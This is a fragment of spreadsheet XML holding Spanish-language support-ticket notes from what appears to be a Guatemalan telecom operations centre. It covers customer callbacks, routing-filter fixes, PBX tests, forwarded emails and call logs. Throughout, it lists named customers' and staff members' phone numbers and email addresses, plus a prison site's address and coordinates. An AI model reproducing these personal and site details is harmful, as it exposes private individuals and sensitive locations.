&lt;FDCEHNSCN1D1EIM1&gt;TELNET  VPN-INSTANCE CITI_BDH 10.1.230.122                    TRYING 10.1.230.122 ...
PRESS CTRL+K TO ABORT</t>
  </si>
  <si>
    <t>F4556921</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DUGLAS GARCIA/84379213 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001242266
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE SOLICITANDO EL DOCUMENTO QUE SE TIENE QUE PRESENTAR PARA EL INGRESO DE LOS TECNICOS
DE: JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 8:00
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; LUIS FERNANDO JUAREZ &lt;LJUAREZ1@HOTMAIL.COM&gt;; ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; SECRETARIADEINFORMATICA.SP@DGSP.GOB.GT &lt;SECRETARIADEINFORMATICA.SP@DGSP.GOB.GT&gt;; NHERNANDEZ@DGSP.GOB.GT &lt;NHERNANDEZ@DGSP.GOB.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SIN SERVICIO || 927700006T || DIRECCION GENERAL DEL SISTEMA PENITENCIARIO. || CARRETERA A PAVON KM 18.7 FRAIJANES GUATEMALA GRANJA PENAL PAVON GUATEMALA FRAIJANES 14.5066 -90.438
BUEN DÍA
FERNANDO CON EL SEGUIMIENTO DEL ENLACE CON EL ID:  927700006T  QUE SE ENCUENTRA UBICADO CARRETERA A PAVON KM 18.7 FRAIJANES GUATEMALA GRANJA PENAL PAVON, CONTARA CON EL DOCUMENTO QUE TIENEN QUE PRESENTAR LOS TÉCNICOS EN EL PUNTO REMOTO PARA EL INGRESO.
QUEDO A LA ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KIMBERLY DIEGUEZ AL 30352698 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001259197
**</t>
  </si>
  <si>
    <t>-* ERICK  (CLIENTE) INFORMA QUE SE ENCUENTRA EN SITIO, SOLICITA APOYO PARA LA CONFIGURACIÓN DE UNA IP ESTATICA EN LA NIC DE SU PC, SE DEJA EN CONFERENCIA CON PERLA ESTRADA (GESTORA) PARA VALIDACIONES Y/O PRUEBAS -*
-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KIMBERLY DIEGUEZ 30352698 QUIEN SOLICITA LA CERTIFICACION PARA EL DOMINGO A LAS 21:00 HRS
SOLICITA LOS DATOS DE PERSONAL TECNICO AL CORREO -- GERENCIA@CASTORSPIZZA.COM --
-ID 2001266671</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KIMBERLY DIEGUEZ AL 30352698 SOLICITA QUE SE LE LLAME EN 1 HR NUEVAMENTE **
ID 2001229228
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GUADALUPE QUIJADA-79878779 NO RESPONDE, SE INTENTARA LUEGO
-ID 20010017279</t>
  </si>
  <si>
    <t>CLEITNE   GUADALUPE QUIJADA-79878779 OCMETNA QUE YA NO TUVO INCONVENIENTE EN LAS LLAMADAS- SERVICIO SIN INCONVENIENTE POR 3 DIAS ### SE CIERRA CASO, POSIBLE PROBLEMA DE PBX- ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GUADALUPE QUIJADA-79878779 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001951720</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GUADALUPE QUIJADA-79878779 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001984745</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GUADALUPE QUIJADA-79878779 NO RESPONDE, SE HANN MARCADO 3 VECES Y NO CONTESTA ##VIVO</t>
  </si>
  <si>
    <t>SE HA LLAMAMDO 2 VECES A CLIETE  GUADALUPE QUIJADA-79878779  ##NO CONTESTA- ##ENVIA A BUZON ##2 VCES ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GUADALUPE QUIJADA-79878779  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001924974</t>
  </si>
  <si>
    <t>ENVIAR CORREO CON  INFORMACION SOBRE LOS CAMBIOS AL CLIENTE PARA CIERRE  INCONVENIENTE RESUELTO .</t>
  </si>
  <si>
    <t>SE VOTA EL ENLACE PRINCIPAL  PARA PODER REALIZAR PRUEBAS CON EL ENLACE  DE CONTINGENCIA.</t>
  </si>
  <si>
    <t>EL PROBLEMA ENCONTRADO ES QUE EL ROUTER PRINCIPAL TENIA UN FILTRO EN  EL ROUTER PARA PREVENIR UN LOOP LOGICO LO CUAL SE REMOVIO POR PARTE DE INGENIERIA CON EL APOYO PARA PODER REESTABLECER EL ENLACE A SU FUNCION PRINCIPAL ES PODER TENER OPERATIVO SIEMPRE EL PUNTO REMOTO POR PARTE DEL CLIENTE.
&lt;GNCYGTG2N2D4A05A15EIM10&gt;PING -C 100000 -B  -VPN MULTIASESORES 10.207.59.7
  PING 10.207.59.7: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!...................................................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</t>
  </si>
  <si>
    <t>SE TEIENE EN CONFERENCIA CON MYNOR VENEGAS CLIENTE JORGE DANIEL VANEGAS INGENIERIA EDGAR GOMEZ  TECNICO.  ALEJANTRO CARDONA IT DE PRISEMART. CON LAS PERSONAS QUE SE ESTAN REALIZANDO PARA PODER SOLVENTAR EL PROBLEMA DE QUE NO ENTRA EN FUNCION EL ENLACE DE CONTIGENCIA CUANDO CAE EL PRINCIPAL.</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 10:07
PARA: PERLA MARISOL ARCHILA VASQUEZ &lt;PERLA.ARCHILA@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; JOSE ANTONIO FERNANDEZ CABRERA &lt;JANTONIO.FERNANDEZ@CLARO.COM.GT&gt;; RICARDO SOSA &lt;RSOSA@GUATEFACTURAS.COM&gt;; MYNOR DIAZ &lt;MDIAZ@GUATEFACTURAS.COM&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; RICARDO CARRILLO - RC &lt;RC@GUATEFACTURAS.COM&gt;; ASTRID ILEANA HERNANDEZ SOSA &lt;ASTRID.HERNANDEZ@CLARO.COM.GT&gt;
ASUNTO: RE: F4544144//GUATEFACTURAS//286900028T
*-*-*-*-*</t>
  </si>
  <si>
    <t>ALEJANDRO CARDONA  IT Y MYNOR  CLIENTE CONFIRMAN QUE SE ENCUENTRA SOLVENTADO CORRECTAMENTE EL INCONVENIENTE ( EL CUAL ERA QUE SE TENIA UN FILTRO EL CUAL NO PERMITIA REDISTRIBUIR LA RUTA ESTATICA QUE NO SE INSTALABA AL CAER EL ENLACE PRINCIPAL  SE MODIFICA FILTRO EL CUAL SE AGREGA SOLAMENTE AL PEER DE CLARO CON ESTO SE ENUNCIA LA RED REDUNDANTE A LA RED DEL CLIENTE .
 SE VALIDARON  EN LAS PRUEBAS  EN EL PROTOCOLO DINAMICO EL CUAL NO REGRESABA POR LO QUE ASU VES SE LE AGREGA FILTRO PARA ELEGIR LA RUTA PRINCIPAL CUAL ESTA SE RESTABLECE EN EL PUNTO REMOTO.</t>
  </si>
  <si>
    <t>||| SE LE ENVIA CORREO A CLIENTE CON DATOS DEL PERSONAL TECNICO, SOLICITA VISITA PARA VM EL DIA LUNES A LAS 21:30
ASUNTO: F4544144//GUATEFACTURAS//286900028T</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 JUAN HERNANDEZ MENCIONA QUE YA TIENEN CERRADO EL TICKET INTERNO
-ID 2001165914</t>
  </si>
  <si>
    <t>TELMEX PIDE QUE SE LE INDIQUE LO REALIZADO EN LA VISITA DEL DIA DE AYER Y SE LE RESPONDE
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 8:18
PARA: CANALES COLIN CHRISTIAN &lt;CCANALES@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; COHETERO SORIANO GERARDO &lt;GCOHETER@UNINET.COM.MX&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0002LA-PA ::: TICKET CNOC IMSCI002704 ::: "EQUIPO APAGADO, SOLICITUD DE REVISIÓN EN CONJUNTO"
MUY BUENOS DÍAS ESTIMADOS.
EN REFERENCIA  A LA VISITA REALIZADA EL DÍA DE AYER 11/05/20222 SE CONFIRMÓ CON PERSONAL DE UFINET QUE EL ROUTER NO SE CAMBIÓ. AL INGRESAR A LAS INSTALACIONES SE LOGRA OBSERVAR QUE EL EQUIPO ESTABA INHIBIDO Y SE RECONFIGURO PARA PODER SOLVENTAR EL INCONVENIENTE.
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS
DE: CANALES COLIN CHRISTIAN &lt;CCANALES@UNINET.COM.MX&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 7:52
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; COHETERO SORIANO GERARDO &lt;GCOHETER@UNINET.COM.MX&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0002LA-PA ::: TICKET CNOC IMSCI002704 ::: "EQUIPO APAGADO, SOLICITUD DE REVISIÓN EN CONJUNTO"
INGENIEROS,
BUEN DÍA,
YA TENEMOS LA CONFIRMACIÓN DE LO QUE SE APLICÓ SOBRE EL EQUIPO PARA RESTABLECER EL SERVICIO?, NECESITAMOS LA INFORMACIÓN A LA BREVEDAD, ESTAMOS PERDIENDO CREDIBILIDAD FRENTE AL CLIENTE.
SALUDOS.
CID:IMAGE002.JPG@01D7885F.FCC8AEC0
CHRISTIAN CANALES COLÍN
SR MANAGEMENT AND SUPPORT OPERATOR
INTERNATIONAL CUSTOMER NETWORK OPERATION CENTER
TEL. +52 55 5174 5299 EXT.13030
CEL. +52 55 3901 5921
CID:IMAGE003.PNG@01D7885F.C0D78760
DE: TECNICORPO [MAILTO:TECNICORPO@CLARO.COM.GT]</t>
  </si>
  <si>
    <t>F4557988</t>
  </si>
  <si>
    <t>SE LLAMA A CAM  2243-7253, ATIENDE LA LLAMADA MALAQUIAS QUIEN COMENTA QUE CORROBORO EN EL PUNTO REMOTO QUE ESTAN HACIENDO REMODELACIONES ELECTRICAS Y POR TAL MOTIVO SE ESTAN PERCIBIENDO REINICIOS EN EL EQUIPO. ASI MISMO INDICA QUE AL PARECER LOS TRABAJOS TERMINAN EN ESTA SEMANA.  SE DEJARA TT APERTURADO HASTA EL DIA LUNES DE LA PROXIMA SEMANA PARA CORROBORAR QUE YA TRABAJE SIN PRESENTAR REINICIOS CONSTANTES. SE ADJUNTA IMAGEN DE LA LLAMADA.</t>
  </si>
  <si>
    <t>F4558097</t>
  </si>
  <si>
    <t>SE TERMINA LLAMADA Y ME PROPORCIONAN DOS NUMEROS DIRECTOS DE LA AGENCIA: 51994788 - 51993589 ME INTENTAN CONTACTAR PERO SE CORTA LA LLAMADA, SE LLAMARA A ESOS CONTACTOS.
3001710643
COLA:
NOMBRE: A: 25041515
NÚMERO: 25041515
DURACIÓN: 0:05:39
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: 25041515
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 19/05/2022 11:21:34</t>
  </si>
  <si>
    <t>SE TERMINA LLAMADA CON EL CLIENTE, RESPONDE OSCAR HERNADNEZ, ME APOYA CON LAS PRUEBAS PERO NO SE LOGRA LEVANTAR EL SERVICIO, POSIBLE CORTE DE FIBRA.
RESULTADO: LLAMADA HECHA
NOMBRE: 54607087
NÚMERO: 54607087
INICIO: HOY, 17:50
FIN: HOY, 18:06
DURACIÓN: 16:03
ID DE LLAMADA: 1001032783</t>
  </si>
  <si>
    <t>SE LLAMA A LOS NUMEROS ANTERIOR MENTE PROPORCIONADOS PERO SON DE OTRA AGENCIA, ME APOYA EN DARME LOS NUEVOS NUMEROS DE LA AGENCIA ALERTADA: 51846495-52034253
1001023318
COLA:
NOMBRE: A: 51994788
NÚMERO: 51994788
DURACIÓN: 0:03:39
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 51994788
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 19/05/2022 17:14:15</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A LA AGENCIA PERO NO SE TIENE RESPUESTA, E LLAMARA A OTRO NUMERO 25041515
3001707837
COLA:
NOMBRE: A: 24715128
NÚMERO: 24715128
DURACIÓN: 0:00:58
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NINGÚN USUARIO RESPONDE (CÓDIGO CAUSA ISDN 18)/480:SIP - NO DISPONIBLE TEMPORALMENTE]
DETALLES: 24715128
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 19/05/2022 11:13:49
3001704031
COLA:
NOMBRE: A: 24715128
NÚMERO: 24715128
DURACIÓN: 0:01:04
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NINGÚN USUARIO RESPONDE (CÓDIGO CAUSA ISDN 18)/480:SIP - NO DISPONIBLE TEMPORALMENTE]
DETALLES: 24715128
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 19/05/2022 11:11:53</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE DAVID SIC PERO NO CONTESTA.
2001092216, 2001092347
COLA:
NOMBRE: A: 56956052
NÚMERO: 56956052
DURACIÓN: 0:00:32
ESTADO: CONECTADA
DETALLES: 56956052
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 12/05/2022 16:47:53</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID SIC 56956052 NO REPSONDE, SE INTENTARA LUEGO
-ID 2001070847</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 56956052 MENCIONA QUE TIENE A OTRO COMPAÑERO QUE LE ESTA APOYANDO
-ID 2001109901</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID SIC 56956052 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001046014 - 2001046192</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DAVID SIC AL 56956052 INDICA QUE VALIDARA CON EL DEPARTAMENTO Y SOLICITA QUE SE LE LLAME A LAS 14:00 HRS
ID 1001954032
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN MALDONADO 56930421 MENCIONA QUE YA TODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 2001023175</t>
  </si>
  <si>
    <t>SE LE INFORMA AL CLIENTE OMAR AGUILAR 52175794 QUE FRANCISCO RIVERA SE ENCUENTRA REVISANDO CONFIGURACIONES, SE CONSULTA CON FRANCISCO E INDICA QUE SE LE PUEDA DAR MEDIA HORA MAS. SE LE INFORMA AL CLIENTE. ID:2001209653</t>
  </si>
  <si>
    <t>COMENTA MILTON DE LA PBX 55118638 QUE CONTINÚA REALIZANDO PRUEBAS DE LLAMADAS, HASTA ESTE MOMENTO NO HA PRESENTADO INCONVENIENTES CON EL AUDIO. INDICA QUE EN BREVE REALIZARÁ PRUEBAS CON LA ALARMA. SOLICITA SE LE LLAME DESPUÉS DEL MEDIO DIA. ID DE LLAMADA: 2001095244</t>
  </si>
  <si>
    <t>SE HABLO CON EL TEC DE LA PBX MILTON, QUIEN INDICA QUE ALGUNAS LLAMADAS NO COMPLETAN. POR LO QUE LLEVO OTRA PBX. PARA HACER PRUEBAS.
TAMBIEN INDICA QUE LA ALARMA NO FUNCIONA.
INDICA QUE DEVOLVERA LA LLAMADA EN 35MIN.
2001979133
COLA:
NOMBRE: A: 55118638
NÚMERO: 55118638
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 55118638
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/05/2022 15:14:05</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE OMAR AGUILAR, QUIE INDICA QUE EL PROVEEDOR DE LA PBX ESTA REALIZANDO LAS PRUEBAS Y SOLICITA QUE SE LLAME A MILTON 55118638
2001978203
COLA:
NOMBRE: A: 52175794
NÚMERO: 52175794
DURACIÓN: 0:00:25
ESTADO: CONECTADA
DETALLES: 52175794
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/05/2022 15:11:49</t>
  </si>
  <si>
    <t>INFORMA MILTON (PROVEEDOR PBX) EN CONFERENCIA CON OSCAR DE TELETECHNO QUE SE REUNIRÁ CON OSCAR DE TELETECHNO EL DIA DE MAÑANA A LAS 8 AM PARA REALIZAR PRUEBAS YA QUE EN ESTE MOMENTO SE ENCUENTRA EN UNA REUNIÓN Y NO PUEDE APOYARNOS.</t>
  </si>
  <si>
    <t>SE LLAMA AL PROVEEDOR PBX MILTON 55118638 ID:1001940667 SE LE COMENTA QUE EL PROVEEDOR TELETECHNO REALIZÓ CAMBIOS EN EL AETHRA, COMENTA QUE REALIZARÁ PRUEBAS</t>
  </si>
  <si>
    <t>SE REALIZAN PRUEBAS DE TRAZAS LLAMANDO AL 23795397  DESDE  23844000 PERO INDICA JORGE CHAVARRIA QUE LAS LLAMADAS NO SE ESTÁN CAPTURANDO, SE REALIZAN VARIAS PRUEBAS PERO NO SE LOGRA VER LAS LLAMADAS. EN LA CONFERENCIA MENCIONA EL PROVEEDOR MILTON QUE EL DÍA DE HOY NO SE HA PRESENTADO EL INCONVENIENTE, AYER SI LES DIÓ PROBLEMA. JORGE CHAVARRIA SUGIERE COORDINAR UNA REUNIÓN EN CONJUNTO CON FRANCISCO RIVERA, SE LE INDICA QUE YA SE HA SOLICITADO APOYO A FRANCISCO PARA REVISAR EL EQUIPO AETHRA. SE CONSULTARÁ CON FRANCISCO RIVERA SI ESTÁ DISPONIBLE PARA REALIZAR UNA CONFERENCIA EL DÍA DE MAÑANA.
3001147484
COLA:
NOMBRE: A: SAQITZUNUN ULIL COJTI LOPEZ
NÚMERO: 4199
DURACIÓN: 0:29:59
ESTADO: DESCONECTADO [ÚLTIMO PARTICIPANTE DE CONFERENCIA]
DETALLES: 4199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 18/05/2022 12:22:21 P. M.</t>
  </si>
  <si>
    <t>SE REALIZAN PRUEBAS DE LLAMADAS EN CONJUNTO CON FRANCISCO RIVERA, WALFRE CONTRERAS, EL SOPORTE DE TELETEHNO Y MILTON GARCIA (PROVEEDOR PBX) Y PROVEEDOR VALIDA QUE YA ESTÁN COMPLENTANDO SIN PROBLEMA. SE ACUERDA QUE MILTON SEGUIRÁ REALIZANDO MÁS PRUEBAS PARA VALIDAR EL FUNCIONAMIENTO.</t>
  </si>
  <si>
    <t>INFORMA PROVEEDOR DE LA PBX MILTON GARCÍA 55118638 QUE EN SUS PRUEBAS AHORA PRESENTA PÉRDIDA DE AUDIO EN SUS LLAMADAS, SOLICITA SE PUEDAN REALIZAR PRUEBAS EN CONJUNTO, SE LE INDICA QUE SOLICITARÁ APOYO A CX PARA TOMAR TRAZAS.</t>
  </si>
  <si>
    <t>INFORMA CLIENTE HUGO 47406181 QUE CONTINÚAN REALIZANDO PRUEBAS CON LA PLANTA PBX, INDICA QUE DESPUES DE LA 13:00 HORAS ESTARÁN APLICANDO ALGUNOS CAMBIOS Y REALIZAR PRUEBAS,  POR LO QUE SOLICITA SE LE LLAME A LAS 2 PM.
2001682548
COLA:
NOMBRE: A: 47406181
NÚMERO: 47406181
DURACIÓN: 0:02:16
ESTADO: CONECTADA
DETALLES: 47406181
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 16/05/2022 12:44:54 P. M.</t>
  </si>
  <si>
    <t>INFORMA FRANCISCO RIVERA QUE YA SE REVIRTIERON LOS CAMBIOS, SE LE INFORMA AL PROVEEDOR HUGO CHACON 47406181 ID:2001855877 QUIEN INDICA QUE PROCEDERÁ A VALIDAR.</t>
  </si>
  <si>
    <t>SE LE INFORMA A CLIENTE OMAR AGUILAR 52175794 LO INDICADO POR FRANCISCO RIVERA, SE LE INDICA QUE SE REVISARÁ LA PARTE DEL TRANSPORTE. CLIENTE ENLAZA A SU PROVEEDOR Y SE LE BRINDA LA MISMA INFORMACIÓN, PROVEEDOR INDICA QUE DESEA HACER UNA CONFERENCIA CON FRANCISCO RIVERA, PERO INDICA QUE EN ESTE MOMENTO NO ESTÁ DISPONIBLE, SOLICITA QUE SEA DE 2 A 2:30 PM. ID:2001241178</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JOSE TORRES 88033522 MENCIONA QUE EL INCONVENIENTE LO ESTA PRESENTANDO EN WHATSAPP CON UN NUMERO MOVIL , SE LE MENCIONA QUE DEBE REPORTAR EL NUMERO COMO TAL YA QUE A NIVEL DE CLARO EL SERVICIO CORPORATIVO ESTA OPERATIVO Y ESTABLE
-ID 2001061793</t>
  </si>
  <si>
    <t>F4558692</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR TECUN AL 37610279 INDICA QUE AUN ESTAN PENDIENTES DE LOS ACCESOS QUE HOY ESTARA CONTACTANDO A ADMINISTRACION  Y CUANDO TENGA RESPUESTA NOS ENVIARA CORREO**
ID 1001958475
**</t>
  </si>
  <si>
